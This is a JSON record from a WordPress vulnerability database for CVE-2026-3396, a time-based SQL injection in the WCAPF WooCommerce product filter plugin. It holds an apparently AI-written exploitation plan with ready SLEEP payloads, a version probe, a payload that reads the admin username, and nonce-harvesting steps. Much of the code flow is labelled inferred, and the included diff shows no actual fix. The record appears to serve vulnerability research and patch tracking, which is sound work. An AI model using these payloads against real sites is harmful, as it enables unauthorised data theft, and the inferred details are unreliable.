[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-UB-2BF8mj6hMuBNM4R5AdqC9OYSQoQYe7W415VPRQM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-3396","wcapf-woocommerce-ajax-product-filter-unauthenticated-time-based-sql-injection","WCAPF – WooCommerce Ajax Product Filter \u003C= 4.2.3 - Unauthenticated Time-Based SQL Injection","WCAPF – WooCommerce Ajax Product Filter plugin is vulnerable to time-based SQL Injection via the 'post-author' parameter in all versions up to, and including, 4.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","wc-ajax-product-filter",null,"\u003C=4.2.3","4.3.0","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-07 00:00:00","2026-04-08 11:16:58",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fee0a762e-9159-4dab-a7be-9cbe332effb1?source=api-prod",1,[22,23,24,25,26,27,28],"build\u002Fform-rtl.css","build\u002Fform.asset.php","build\u002Fform.css","build\u002Fform.js","build\u002Flist-forms-rtl.css","build\u002Flist-forms.asset.php","build\u002Flist-forms.css","researched",false,3,"# Exploitation Research Plan: CVE-2026-3396 (WCAPF SQL Injection)\n\n## 1. Vulnerability Summary\nThe **WCAPF – WooCommerce Ajax Product Filter** plugin (versions \u003C= 4.2.3) contains an unauthenticated time-based SQL injection vulnerability. The flaw exists in the handling of the `post-author` parameter within AJAX filtering requests. User input is concatenated directly into a SQL query without proper sanitization (e.g., `absint()`) or the use of `$wpdb->prepare()`. Because this occurs in an AJAX handler registered for unauthenticated users, any attacker can execute arbitrary SQL queries to extract sensitive data from the database.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `wcapf_ajax_filter` (inferred from plugin functionality)\n*   **Vulnerable Parameter:** `post-author`\n*   **Authentication:** None required (Unauthenticated)\n*   **Payload Type:** Time-based blind SQL Injection\n*   **Preconditions:** The plugin must be active. A valid AJAX nonce is likely required, though often accessible on the shop page.\n\n## 3. Code Flow (Inferred)\n1.  
**Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with `action=wcapf_ajax_filter`.\n2.  **Hook Registration:** The plugin registers the action via:\n    `add_action( 'wp_ajax_nopriv_wcapf_ajax_filter', [ $this, 'ajax_filter' ] );`\n3.  **Input Acquisition:** The handler function (e.g., `ajax_filter()`) retrieves the `post-author` value from `$_POST` or `$_GET`.\n4.  **Vulnerable Processing:** The plugin constructs a query to filter products by author. It likely interpolates the `post-author` value directly into the `WHERE` clause:\n    ```php\n    $author = $_POST['post-author'];\n    $results = $wpdb->get_results(\"SELECT ... WHERE post_author IN ($author) ...\");\n    ```\n5.  **Sink:** The raw SQL string is executed by `$wpdb->get_results()`, triggering the injection.\n\n## 4. Nonce Acquisition Strategy\nThe plugin typically localizes its configuration and security nonces for frontend use.\n\n1.  **Identify Shortcode:** The plugin uses `[wcapf_form]` or `[wcapf_products]` to display filters.\n2.  **Create Test Page:**\n    `wp post create --post_type=page --post_title=\"Shop Filter\" --post_status=publish --post_content=\"[wcapf_form]\"`\n3.  **Navigate to Page:** Use `browser_navigate` to visit the newly created page.\n4.  **Extract Nonce:** The plugin localizes data into a JavaScript object. Based on common patterns in WCAPF, the object is likely `wcapf_params`.\n    *   **JS Command:** `browser_eval(\"window.wcapf_params?.nonce\")`\n    *   **Alternative:** If not found, check for any localized object containing \"nonce\" using `browser_eval(\"Object.keys(window).filter(k => k.includes('wcapf'))\")`.\n\n## 5. Exploitation Strategy\nThe goal is to confirm the vulnerability using a time-based payload.\n\n### Step-by-Step Execution:\n\n1.  
**Discovery:** Locate the exact AJAX action and localized variable name by searching the plugin directory:\n    *   `grep -r \"wp_ajax_nopriv\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fwc-ajax-product-filter\u002F`\n    *   `grep -r \"wp_localize_script\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fwc-ajax-product-filter\u002F`\n\n2.  **Baseline Request:** Send a legitimate request to measure the standard response time.\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=wcapf_ajax_filter&wcapf_nonce=[NONCE]&post-author=1\n    ```\n\n3.  **Sleep Payload:** Send the injection payload.\n    *   **Parameter:** `post-author`\n    *   **Value:** `1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a`\n    *   **Encoded Value:** `1)%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a`\n\n4.  **Data Extraction (PoC):** Extract the database version.\n    *   **Payload:** `1) AND (SELECT 1 FROM (SELECT(IF(SUBSTRING(VERSION(),1,1)='8',SLEEP(5),0)))a`\n\n## 6. Test Data Setup\n1.  **Install Dependencies:** Ensure WooCommerce is installed and active.\n2.  **Create Product:**\n    `wp eval \"if(!get_page_by_path('test-product', OBJECT, 'product')){ wc_create_product(['name' => 'Test Product']); }\"`\n3.  **Create Filter Page:**\n    `wp post create --post_type=page --post_title=\"Filter Test\" --post_status=publish --post_content='[wcapf_form]' --post_name='filter-test'`\n4.  **Identify Nonce:** Visit `\u002Ffilter-test` and extract `wcapf_params.nonce`.\n\n## 7. Expected Results\n*   **Baseline:** Response time \u003C 500ms.\n*   **Attack:** Response time > 5000ms.\n*   **Response Body:** Likely a JSON object with a `success` key or an HTML snippet of filtered products.\n\n## 8. Verification Steps\nAfter confirming the delay, verify the database state to ensure no permanent damage occurred (though SQLi here is READ-only by description):\n1.  
Check for the existence of the `wp_users` table content using the SQLi to confirm extraction capability:\n    *   **Payload:** `1) AND (SELECT 1 FROM (SELECT(IF(ASCII(SUBSTRING((SELECT user_login FROM wp_users WHERE ID=1),1,1))=97,SLEEP(5),0)))a` (Checks if admin username starts with 'a').\n\n## 9. Alternative Approaches\n*   **Boolean-Based Blind:** If `post-author=1` returns products and `post-author=1 AND 1=2` returns \"No products found\", switch to boolean-based extraction as it is significantly faster than time-based.\n*   **Error-Based:** Check if `post-author=1'` triggers a visible database error in the AJAX response. If `WP_DEBUG` is on, use `updatexml()` or `extractvalue()` for immediate data extraction.\n*   **Action Name Variations:** If `wcapf_ajax_filter` fails, check for `wcapf_filter` or `wcapf_apply_filter` by searching for `add_action.*wp_ajax` in the plugin's `includes\u002F` directory.","The WCAPF – WooCommerce Ajax Product Filter plugin for WordPress is vulnerable to unauthenticated time-based SQL Injection via the 'post-author' parameter in version 4.2.3 and earlier. This occurs because user input is concatenated directly into a SQL query without proper sanitization or the use of WordPress's database preparation methods, allowing attackers to extract sensitive data via time-based inference.","\u002F\u002F Inferred logic in the AJAX handler (e.g., ajax_filter() in the plugin's AJAX controller)\n$author = $_POST['post-author'];\n$results = $wpdb->get_results(\"SELECT ... 
WHERE post_author IN ($author) ...\");","Only in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-ajax-product-filter\u002F4.2.3\u002Fadmin: lib\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-ajax-product-filter\u002F4.2.3\u002Fbuild\u002Fform.asset.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-ajax-product-filter\u002F4.3.0\u002Fbuild\u002Fform.asset.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-ajax-product-filter\u002F4.2.3\u002Fbuild\u002Fform.asset.php\t2025-01-19 19:46:38.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-ajax-product-filter\u002F4.3.0\u002Fbuild\u002Fform.asset.php\t2026-03-16 16:38:52.000000000 +0000\n@@ -1 +1 @@\n-\u003C?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n', 'wp-notices', 'wp-primitives'), 'version' => '989ca2867ffeee42d68e');\n+\u003C?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n', 'wp-notices', 'wp-primitives'), 'version' => 'ce3dee3c876dd11dfb86');","To exploit this vulnerability, an unauthenticated attacker follows these steps:\n1. Access the shop page or any page where the WCAPF filter is active to obtain a valid nonce from the localized 'wcapf_params' JavaScript object (e.g., `window.wcapf_params.nonce`).\n2. Construct a POST request directed at `\u002Fwp-admin\u002Fadmin-ajax.php` with the `action` parameter set to `wcapf_ajax_filter`.\n3. Include the extracted nonce in the `wcapf_nonce` parameter.\n4. Inject a time-based SQL payload into the `post-author` parameter, such as `1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a`.\n5. 
Verify the injection by observing that the server's response time is delayed by the amount specified in the SLEEP command (e.g., 5 seconds).","gemini-3-flash-preview","2026-04-17 21:03:11","2026-04-17 21:03:44",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","4.2.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-ajax-product-filter\u002Ftags\u002F4.2.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwc-ajax-product-filter.4.2.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-ajax-product-filter\u002Ftags\u002F4.3.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwc-ajax-product-filter.4.3.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-ajax-product-filter\u002Ftags"]